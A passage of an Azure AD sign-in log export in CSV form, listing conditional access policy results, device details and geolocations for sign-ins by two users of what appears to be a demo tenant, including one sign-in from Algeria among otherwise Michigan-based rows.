+1236,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:08.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ef5454f-2867-461b-ab3c-8d287739e781,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3cee27f0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5f11d930-41ca-43a7-b362-f3cee27f0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1237,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:17.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5fc88024-725e-4a9b-8651-48e0d6ac3ba8,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db359221-fdda-4bf1-8b37-6f46bf610e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,db359221-fdda-4bf1-8b37-6f46bf610e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1238,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,09:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c583003d-5de2-43f7-84cf-33a1b0067af7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3cec8880c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5f11d930-41ca-43a7-b362-f3cec8880c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1239,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:55.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3fc4bea7-e1fa-481e-8e82-279aaf7dbc12,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",69bf3c7f-96b8-4aae-959c-a7bbc9650d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,69bf3c7f-96b8-4aae-959c-a7bbc9650d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1240,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9cae6bc9-488b-44de-a938-b85c59ebb98e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",89223cb6-60af-4a3e-b2e1-947006630700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947006630700,SigninLogs,Sucess,28,3
+1241,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:52.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:55,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5714f801-8f28-450e-90af-3c3cd63a2700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5714f801-8f28-450e-90af-3c3cd63a2700,SigninLogs,Sucess,32.0840416,34.88776016
+1242,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:15.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9356a377-071b-4d67-b04e-2abc6b9cf378,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1f656d90-8802-4e53-aa2e-754646090c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1f656d90-8802-4e53-aa2e-754646090c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1243,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:15.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9356a377-071b-4d67-b04e-2abc6b9cf378,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1f656d90-8802-4e53-aa2e-754646090c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint 